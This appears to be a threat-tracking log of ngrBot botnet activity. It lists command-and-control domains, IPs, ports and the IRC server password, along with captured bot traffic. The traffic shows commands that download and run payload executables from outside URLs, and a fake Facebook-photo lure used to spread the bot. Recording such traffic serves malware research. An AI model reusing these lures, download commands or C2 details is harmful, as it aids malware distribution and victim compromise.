matea.dukatlgg.com(botnet hosted in United States Staminus Communications)

* Dns resolving haso.dukatlgg.com
–
* Dns resolved haso.dukatlgg.com to 72.20.30.119
–
* Dns resolving matea.dukatlgg.com
–
* Dns resolved matea.dukatlgg.com to 72.20.30.119
Dns resolved haso.dukatlgg.com to 67.159.63.63

Remote Host Port Number
213.251.170.52 80

70.38.98.234 80

70.38.98.237 80

70.38.98.238 80

72.20.30.119 8888 PASS ngrBot

PRIVMSG #msn :[MSN]: Updated MSN spread message to “hahah.. your photo? http://apps.facebook.com/yourphooto/photo.php?=53821324”
PRIVMSG #TeST-RouNd_03# :[d=”http://img104.herosh.com/2011/04/13/183566678.gif” s=”80384 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:Documents and SettingsUserNameApplication Data1.tmp”
PRIVMSG #r :[Ruskill]: Detected DNS: “google.at”
PRIVMSG #r :[Ruskill]: Detected DNS: “narod.ru”
PRIVMSG #TeST-RouNd_03# :[d=”http://img101.herosh.com/2011/04/13/172990124.gif” s=”67584 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:WINDOWSsystem32drwtsn32.exe”
QUIT :rebooting
NICK n{US|XPa}xgaszol
USER xgaszol 0 0 :xgaszol
JOIN #TeST-RouNd_03# ngrBot
JOIN #new
JOIN #msn
PRIVMSG #msn :[MSN]: Updated MSN spread interval to “1”

72.20.30.119 3333 PASS ngrBot

NICK n{US|XPa}pniwxfx
USER pniwxfx 0 0 :pniwxfx
NICK n{US|XPa}mdqgmbq
USER mdqgmbq 0 0 :mdqgmbq

UPDATE:
JOIN #update
PRIVMSG #spread :[MSN]: Updated MSN spread interval to “7”
PRIVMSG #spread :[MSN]: Updated MSN spread message to “hahah! http://apps.facebook.com/yourphooto/photo.php?=fb-pic313.jpg”
PRIVMSG #spread :[HTTP]: Updated HTTP spread interval to “3”
PRIVMSG #spread :[HTTP]: Updated HTTP spread message to “hahah! http://apps.facebook.com/yourphooto/photo.php?=fb-pic313.jpg”
PRIVMSG #update :[d=”http://coremediaarea.in/install.52161.exe” s=”79360 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected File: “C:Documents and SettingsUserNameApplication Data1.tmp”
PRIVMSG #r :[Ruskill]: Detected DNS: “repubblica.it”
PRIVMSG #update :[d=”http://img103.herosh.com/2011/04/22/185746627.gif” s=”69632 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data2.tmp” – Download retries: 0
PRIVMSG #r :[Ruskill]: Detected DNS: “seesaa.net”
PRIVMSG #r :[Ruskill]: Detected DNS: “yelp.com”
PRIVMSG #update :[d=”http://picture8.fileave.com/facebook-pic0444320279.jpg.exe” s=”200704 bytes”] Update error: MD5 mismatch (6EFCA88171EC593C64E842100F186811 != 18BEAD45E13BC1AA2BDAD562C682B413)
NICK n{US|XPa}evywles
USER evywles 0 0 :evywles
JOIN #DarkSons# ngrBot
JOIN #new
JOIN #spread
JOIN #nazel

infos about hosting:
http://whois.domaintools.com/72.20.30.119